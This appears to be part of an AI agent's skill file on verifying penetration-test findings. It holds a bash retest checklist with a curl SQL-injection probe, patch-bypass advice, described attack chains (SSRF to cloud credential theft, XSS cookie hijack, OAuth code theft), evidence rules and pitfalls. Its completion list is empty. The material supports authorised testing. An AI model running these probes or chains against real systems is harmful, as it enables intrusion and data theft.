Missing security headers:    Informational — not scored
Open redirect:               CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N = 5.3
```
```bash
# Step 1: Document the original vulnerability
# Save: original request, response, exploitation evidence

# Step 2: Verify the fix is deployed
# Check version, patch level, or deployment timestamp
curl -s -I https://target.com | search_text -i "server|x-powered-by|x-version"

# Step 3: Replay the exact original exploit
# Use saved curl command / BurpSuite repeater
curl -v -k "https://target.com/page?id=1'" 2>&1 | tee regression/sqli_retest.txt

# Step 4: Try bypass variations
# If original was blocked, try:
# - Different encoding (URL encode, double encode, unicode)
# - Different injection point (header, cookie, POST body)
# - Alternative payloads (different SQL syntax, different XSS vector)

# Step 5: Test adjacent functionality
# If /page?id= was fixed, also test:
# - /other-page?id=
# - /api/page?id=
# - POST /page with id in body

# Step 6: Nuclei re-scan with original template
nuclei -u https://target.com -t /path/to/original-finding-template.yaml -debug

# Step 7: Document result
# FIXED: original exploit no longer works, bypasses fail
# PARTIALLY FIXED: original blocked but bypass works
# NOT FIXED: original exploit still works
# REGRESSION: fix introduced new vulnerability
```
```
CHAIN 1: Information Disclosure → Account Takeover
  Step 1: IDOR at /api/users/ID → leaks email + password reset token
  Step 2: Use token to reset admin password
  Step 3: Login as admin
  Individual: IDOR=Medium, Token leak=Medium
  Chained: Critical (full account takeover)

CHAIN 2: SSRF → Cloud Credential Theft → Data Breach
  Step 1: SSRF via image proxy → access metadata endpoint
  Step 2: Retrieve IAM credentials from metadata
  Step 3: Use creds to access S3 buckets with customer data
  Individual: SSRF=High, Misconfigured IAM=Medium
  Chained: Critical (full cloud compromise)

CHAIN 3: XSS → Session Hijack → Admin Access
  Step 1: Stored XSS in user profile bio field
  Step 2: Admin views user profile → XSS fires
  Step 3: Exfiltrate admin session cookie (no HttpOnly)
  Step 4: Use admin session to access admin panel
  Individual: Stored XSS=Medium, Missing HttpOnly=Low
  Chained: High-Critical (admin access via non-privileged user)

CHAIN 4: Open Redirect → OAuth Token Theft
  Step 1: Open redirect at /callback?next=URL
  Step 2: Craft OAuth flow to redirect auth code to attacker
  Step 3: Exchange stolen auth code for access token
  Individual: Open Redirect=Low, OAuth misconfiguration=Medium
  Chained: High (account takeover via OAuth)

CHAIN 5: LFI → Source Code → Hardcoded Creds → RCE
  Step 1: LFI reads application source code
  Step 2: Source code contains database credentials
  Step 3: Database access enables SQL-based command execution
  Individual: LFI=Medium, Hardcoded creds=Medium
  Chained: Critical (remote code execution)

DOCUMENTATION FORMAT FOR CHAINS:
- Number each step clearly
- Show evidence for each step
- Explain why each step enables the next
- Score the chain as a whole, referencing individual components
- Note: chains often have higher CVSS than any individual component
```
```
FOR EVERY CONFIRMED VULNERABILITY:
□ Unique finding ID (e.g., VULN-001)
□ Vulnerability title (clear, specific)
□ Affected URL/endpoint/IP:port
□ HTTP method and parameters
□ Full HTTP request (redacted if needed)
□ Full HTTP response (redacted if needed)
□ Screenshot of exploitation
□ Step-by-step reproduction instructions
□ CVSS score with vector string
□ Remediation recommendation
□ References (CVE, CWE, OWASP)

EVIDENCE FORMAT:
- Screenshots: PNG, annotated with arrows/highlights
- HTTP traffic: save as .txt or export from BurpSuite
- Command output: full terminal copy, with timestamps
- Data samples: 3-5 records max, PII redacted

SANITIZATION RULES:
- Replace real passwords with [REDACTED]
- Blur/redact SSN, credit cards, personal data in screenshots
- Keep enough structure to prove the vulnerability
- Never include full credential dumps in reports
```
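Redaction of saved HTTP evidence can be partly automated; a sketch with sed — the field names are illustrative, so extend the patterns for the target's actual schema:

```bash
# Redact common credential fields in saved JSON/HTTP evidence, keeping the
# surrounding structure intact so the finding remains provable.
redact_evidence() {
    sed -E \
        -e 's/("(password|passwd|secret|token|api_key)"[[:space:]]*:[[:space:]]*")[^"]*/\1[REDACTED]/g' \
        -e 's/(Authorization: Bearer )[A-Za-z0-9._-]+/\1[REDACTED]/g' \
        "$1"
}
```

Always eyeball the redacted output before it goes into a report; automated patterns miss fields they were never told about.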
Accepting scanner results at face value — Scanners lie. A "Critical" finding from nuclei might be a version-based guess that's actually patched. Always verify manually before reporting.
Stopping at alert(1) — An XSS alert(1) proves script execution exists but doesn't demonstrate real impact. Show cookie theft, DOM manipulation, or session hijacking to convey actual risk.
Not testing false positive indicators — WAFs, CDNs, and proxies modify responses. Your "SQLi" might be the WAF error page, not a database error. Verify you're seeing the application's response, not a security appliance.
Dumping entire databases — For verification, you need 3-5 sample records, not 100,000 rows. Full dumps waste time, risk exposure, and may violate engagement scope.
Ignoring chain opportunities — A "Low" IDOR + "Low" info disclosure might chain into a "Critical" account takeover. Always consider how findings combine.
Not testing remediation thoroughly — Confirming the original payload fails is insufficient. Test bypass variations, alternative injection points, and encoding tricks. Weak patches create false confidence.
Missing context in evidence — A screenshot of extracted data without showing the request that caused it is useless. Always capture the full request → response → impact chain.
Wrong CVSS scoring — Over-scoring damages credibility as much as under-scoring. Score based on what you PROVED, not what's theoretically possible. Justify every metric choice.
Not documenting reproduction steps — If another tester can't reproduce your finding from your notes alone, the evidence is incomplete. Write steps as if for someone who's never seen the application.
Testing fixes in production without coordination — Regression testing in production can trigger alerts, break things, or get your IP banned. Coordinate with the client/blue team before retesting.
Confusing vulnerability with exposure — An exposed /server-status page is an exposure (informational). A /server-status page leaking session tokens in URLs is a vulnerability (medium-high). Classify correctly.
Not checking security headers when verifying XSS — CSP, HttpOnly cookies, and X-XSS-Protection headers fundamentally change XSS impact. A "Critical" XSS with strict CSP might actually be "Low" or unexploitable. Always check the full security header context.
This skill's work is DONE when ALL of the following are true:
When all conditions are met, state "Phase complete: vulnerability-verification" and stop. Do NOT write the final report, attempt exploitation, or discover new vulnerabilities — those are other skills' jobs.